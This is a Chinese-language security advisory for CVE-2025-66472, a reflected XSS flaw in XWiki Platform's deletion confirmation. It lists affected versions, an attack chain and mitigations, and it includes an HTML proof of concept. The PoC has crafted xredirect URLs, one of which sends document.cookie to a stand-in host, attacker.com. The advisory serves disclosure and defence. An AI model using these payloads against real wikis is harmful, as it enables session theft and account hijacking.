CVE-2025-66472 XWiki Platform 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-66472

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

XWiki Platform Flamingo Skin Resources, XWiki Platform Web Templates

漏洞概述

CVE-2025-66472是XWiki Platform中的一个中等严重性反射型跨站脚本（XSS）漏洞。该漏洞存在于XWiki Platform的Flamingo皮肤资源组件和Web模板组件中，影响版本6.2-milestone-1至16.10.9以及17.0.0-rc-1至17.4.1。攻击者可以利用删除确认消息功能注入恶意JavaScript代码，当其他用户查看相关内容并点击"否"按钮时，注入的脚本将在用户浏览器上下文中执行，从而窃取会话Cookie、劫持用户会话或执行其他恶意操作。由于该漏洞无需认证即可利用，且攻击复杂度较低，因此具有较高的实际威胁性。XWiki官方已在16.10.10和17.4.2版本中修复了此漏洞。

技术细节

该反射型XSS漏洞源于XWiki Platform Flamingo皮肤资源组件和Web模板组件在处理删除确认消息时，未对用户输入进行充分的HTML转义或验证。攻击者可以通过构造特殊的URL参数，在删除确认消息中注入恶意的HTML/JavaScript代码。当受害者访问包含恶意载荷的URL并触发删除确认对话框，点击"否"按钮时，之前注入的恶意脚本会在受害者浏览器中执行。攻击者可以利用此漏洞窃取受害者的认证令牌、Cookie信息、浏览历史记录，或在用户不知情的情况下执行敏感操作。由于该漏洞属于反射型XSS，需要一定的用户交互（如点击链接）才能触发，因此增加了攻击的复杂性，但也意味着攻击更具针对性。

攻击链分析

STEP 1

步骤1

攻击者识别目标XWiki Platform实例，并确定存在漏洞的删除确认功能端点

STEP 2

步骤2

攻击者构造恶意URL，通过xredirect参数注入XSS载荷，如<img src=x onerror=alert(document.cookie)>

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或其他方式诱骗受害者点击包含恶意载荷的链接

STEP 4

步骤4

受害者访问恶意URL后，页面加载并显示删除确认对话框

STEP 5

步骤5

当受害者点击"否"按钮拒绝删除时，注入的恶意JavaScript代码在受害者浏览器上下文中执行

STEP 6

步骤6

恶意脚本窃取受害者的Cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

STEP 7

步骤7

攻击者利用窃取的凭证劫持受害者会话，执行未授权操作或进一步渗透系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-66472 PoC: Reflected XSS in XWiki Platform deletion confirmation -->
<!-- This PoC demonstrates the XSS vulnerability in the deletion confirmation message -->

<!-- Malicious URL that triggers the XSS -->
<!-- Replace TARGET_URL with the vulnerable XWiki instance URL -->
<!-- The payload uses the 'xredirect' parameter to inject JavaScript -->

<!-- Example attack URL structure -->
<!-- https://TARGET_URL/xwiki/bin/delete/SomePage?xredirect=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -->

<!-- HTML PoC -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-66472 XSS PoC</title>
</head>
<body>
    <h1>CVE-2025-66472 Reflected XSS PoC</h1>
    <p>Click the link below to trigger the vulnerability:</p>
    
    <!-- Malicious link that exploits the XSS via xredirect parameter -->
    <a href="http://TARGET_XWIKI_URL/xwiki/bin/delete/SomePage?xredirect=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E" target="_blank">
        Click to Delete Page (Malicious Link)
    </a>
    
    <p>Alternative payload using script tag:</p>
    <a href="http://TARGET_XWIKI_URL/xwiki/bin/delete/SomePage?xredirect=%3Cscript%3Efetch(%27https://attacker.com/steal?c=%27%2Bdocument.cookie)%3C/script%3E" target="_blank">
        Alternative XSS Payload
    </a>
    
    <script>
        // Auto-generate malicious URLs
        const baseUrl = 'http://TARGET_XWIKI_URL/xwiki/bin/delete/';
        const pageName = 'SomePage';
        
        // Payload that injects JavaScript via xredirect parameter
        const xssPayload = '\"><script>alert(document.domain)</script>';
        const encodedPayload = encodeURIComponent(xssPayload);
        
        const maliciousUrl = baseUrl + pageName + '?xredirect=' + encodedPayload;
        console.log('Malicious URL:', maliciousUrl);
    </script>
</body>
</html>

影响范围

XWiki Platform Flamingo Skin Resources 6.2-milestone-1 至 16.10.9

XWiki Platform Web Templates 6.2-milestone-1 至 16.10.9

XWiki Platform Flamingo Skin Resources 17.0.0-rc-1 至 17.4.1

XWiki Platform Web Templates 17.0.0-rc-1 至 17.4.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)上配置规则，过滤包含xredirect参数中可疑XSS特征的请求；2) 禁用不必要的删除确认功能或限制其使用范围；3) 加强对管理员和用户的安全培训，提高对钓鱼攻击的警惕性；4) 实施严格的会话管理和多因素认证，降低账户被劫持的风险；5) 监控日志中的异常请求模式，及时发现潜在的攻击活动。